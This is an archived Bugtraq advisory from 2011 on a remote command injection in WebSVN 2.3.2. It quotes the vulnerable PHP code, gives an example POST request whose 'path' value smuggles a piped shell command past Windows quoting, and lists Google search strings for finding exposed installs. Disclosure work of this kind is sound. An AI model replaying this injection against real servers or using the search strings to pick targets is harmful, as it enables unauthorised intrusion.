Home page logo
/

bugtraq logo Bugtraq mailing list archives

WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Commands Injection Vulnerability
From: nospam () gmail it
Date: Fri, 3 Jun 2011 05:24:08 -0600

WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Commands Injection Vulnerability

tested against: Microsoft Windows Server R2 SP2 
                PHP 5.3.6 VC9 with magic_quotes_gpc = off (default)
                Apache 2.2.17 VC9

Introduction:
This is a very special vulnerabilty, given the incredibly high number 
of machines involved. This can be verified by submitting the following
queries to Google:

"Powered by WebSVN * and Subversion"
"Powered by WebSVN 2.3.2 and Subversion"

homepage url: http://websvn.tigris.org/

Description says:
"WebSVN offers a view onto your subversion repositories that's been designed to 
reflect the Subversion methodology. You can view the log of any file or directory
and see a list of all the files changed, added or deleted in any given revision.
You can also view compare two versions of a file so as to see exactly what was 
changed in a particular revision.

Since it's written using PHP, WebSVN is very portable and easy to install."

Vulnerabilty:

Without prior authentication, if the 'allowDownload' option is enabled 
in config.php, meaning that a tarball download is allowed across all the 
repositories (not uncommon), an attacker can invoke the dl.php script
and passing a well formed 'path' argument to execute arbitrary
commands against the underlying operating system.


Vulnerable code:

look at dl.php, lines 114-139:

..
} else {
                @unlink($tempDir);
                mkdir($tempDir);
                // Create the name of the directory being archived
                $archiveName = $path;
                $isDir = (substr($archiveName, -1) == '/');
                if ($isDir) {
                        $archiveName = substr($archiveName, 0, -1);
                }
                $archiveName = basename($archiveName);
                if ($archiveName == '') {
                        $archiveName = $rep->name;
                }
                $plainfilename = $archiveName;
                $archiveName .= '.r'.$rev;
                
                // Export the requested path from SVN repository to the temp directory
                $svnExportResult = $svnrep->exportRepositoryPath($path, $tempDir.DIRECTORY_SEPARATOR.$archiveName, 
$rev, $peg);
                
                if ($svnExportResult != 0) {
                        header('HTTP/1.x 500 Internal Server Error', true, 500);
                        error_log('svn export failed for: '.$archiveName);
                        print 'svn export failed for "'.xml_entities($archiveName).'".';
                        removeDirectory($tempDir);
                        exit(0);
                }
..


then look at exportRepositoryPath() function inside ./include/svnlook.php, lines 879-896:
..
// {{{ exportDirectory
        //
        // Exports the directory to the given location

        function exportRepositoryPath($path, $filename, $rev = 0, $peg = '') {
                $cmd = $this->svnCommandString('export', $path, $rev, $peg).' '.quote($filename); //<---------------
                $retcode = 0;
                
                execCommand($cmd, $retcode); //<----------------------
                
                if ($retcode != 0) {
                        global $lang;
                        error_log($lang['BADCMD'].': '.escape($cmd));
                }
                return $retcode;
        }

        // }}}
..

again look at execCommand() function inside ./include/command.php, lines 107-123:

..
// {{{ execCommand

function execCommand($cmd, &$retcode) {
        global $config;

        // On Windows machines, the whole line needs quotes round it so that it's
        // passed to cmd.exe correctly
        // Since php 5.3.0 the quoting seems to be done internally

        if ($config->serverIsWindows && version_compare(PHP_VERSION, '5.3.0alpha') === -1) {
                $cmd = '"'.$cmd.'"'; //<------------ nonsense ...
        }

        return @exec($cmd, $tmp, $retcode); //<--------------------- boom
}

// }}}
..


also, look at quote() inside ./include/command.php:

..
// {{{ quote
//
// Quote a string to send to the command line

function quote($str) {
        global $config;

        if ($config->serverIsWindows) {
                return '"'.$str.'"'; //<--------------------------- !!!
        } else {
                return escapeshellarg($str); //<------------ this should work properly on Linux instead
        }
}

// }}}
..


Example packet:

POST /websvn/dl.php HTTP/1.1
User-Agent: Mozilla/4.0
Host: 192.168.0.1
Accept: */*
Cookie: storedsesstemplate=.%00; storedtemplate=.%00;
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

path=./../../x%22%7Cver%3Esuntzu.txt%7C%22


the resulting command line is like this:

"c:\SVN\bin\svn" --non-interactive --config-dir C:\SVN\tmp\export 
"URL%20to%20repository%20%28e.g.%20file:///d:/SubVersion/proj%29./../../x%22%7Cver%3Esuntzu.txt%7C%22@" "C:\Documents 
and Settings
\Administrator\Local Settings\Temp\web554.tmp\x"|ver>suntzu.txt|".r"

allowing you to inject arbitrary commands via the pipe char.

Proof of concept code:

http://retrogod.altervista.org/rgod_websvn_poc.html

original url: http://retrogod.altervista.org/rgod_websvn_adv.html


  By Date           By Thread  

Current thread:
  • WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Commands Injection Vulnerability nospam (Jun 03)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]